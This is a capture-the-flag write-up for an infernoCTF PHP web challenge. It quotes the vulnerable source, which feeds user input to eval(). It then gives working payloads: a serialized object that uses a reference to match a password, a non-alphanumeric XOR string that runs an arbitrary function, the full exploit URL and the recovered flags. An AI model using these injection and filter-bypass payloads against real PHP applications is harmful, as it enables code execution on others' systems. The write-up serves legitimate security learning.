Tags: php web
Rating: 5.0
# Dank PHP
1) Intro
2) First problem, the ID
3) Second problem, the $\_(]" language
## Intro
Let's see what's the goal here
```
secret = $flag1;
if ($usr->name === "admin" && $usr->pass === $usr->secret) {
echo "Congratulation! Here is something for you... " . $usr->pass;
if (isset($_GET['caption'])) {
$cap = $_GET['caption'];
if (strlen($cap) > 45) {
die("Naaaah, Take rest now");
}
if (preg_match("/[A-Za-z0-9]+/", $cap)) {
die("Don't mess with the best language!!");
}
eval($cap);
// Try to execute echoFlag()
} else {
echo "NVM You are not eligible";
}
} else {
echo "Oh no... You can't fool me";
}
} else {
echo "are you trolling?";
}
} else {
echo "Go and watch some Youthoob Tutorials Kidosss!!";
}
```
The goal is to reach this point
`eval($cap);`
eval() is used to execute the code passed in parameter
To reach it, we have to go through all these if.
## First problem, the ID
Let's see the first if.
` if (isset($_GET['id']) { `
We need a 'id' value in the URL
` http://104.197.168.32:17010/?id=test`
It works !
Next if, we need to valid value for this if :
` if ($usr) { `
`$usr` is defined if `$_GET['id']` is unserializable.
Let's made a unserializable "user" object with admin in name
So now the URL is ` 104.197.168.32:17010/?id=O:4:"user":3:{s:4:"name";s:5:"admin";s:4:"pass";s:4:"test";s:6:"secret";s:4:"test";} `
Now, let's set the value of 'pass' as a reference to 'secret'
` 104.197.168.32:17010/?id=O:4:"user":3:{s:4:"name";s:5:"admin";s:4:"pass";N;s:6:"secret";R:3;} `
And it works ! We have the first part of the flag : `infernoCTF{pHp_1s_`
## Second problem, the $\_(]" language
Now we have to get the second part of the flag, by executing `echoFlag()`
BUT, with this if : ` if (preg_match("/[A-Za-z0-9]+/", $cap)) { `, we can't use alphanumeric characters.
So, after a few research, i found the [works of @mvisat](https://gist.github.com/mvisat/03592a5ab0743cd43c2aa65bf45fef21)
With a few modifications, it gave us ``$_="`{{{"^"?<>/";${$_}['_']();``, which is the same as `$_GET["_"]();`
Now we give echoFlag as a parameter to the url.
Final url : ``http://104.197.168.32:17010/?id=O:4:%22user%22:3:{s:4:%22name%22;s:5:%22admin%22;s:4:%22pass%22;N;s:6:%22secret%22;R:3;}&caption=$_="`{{{"^"?<>/";${$_}['_']();&_=echoFlag``
It gives us the end of the entire flag : `infernoCTF{pHp_1s_a_h34dache}`
-----------------------------------------------
_If you have any questions, you can pm me on Discord, nhy47paulo#3590_
_PS: It's my first writeup, so tell me if you have any advices or remarks ^^_
_PPS: i'm French, sorry for the mistakes. ^^_
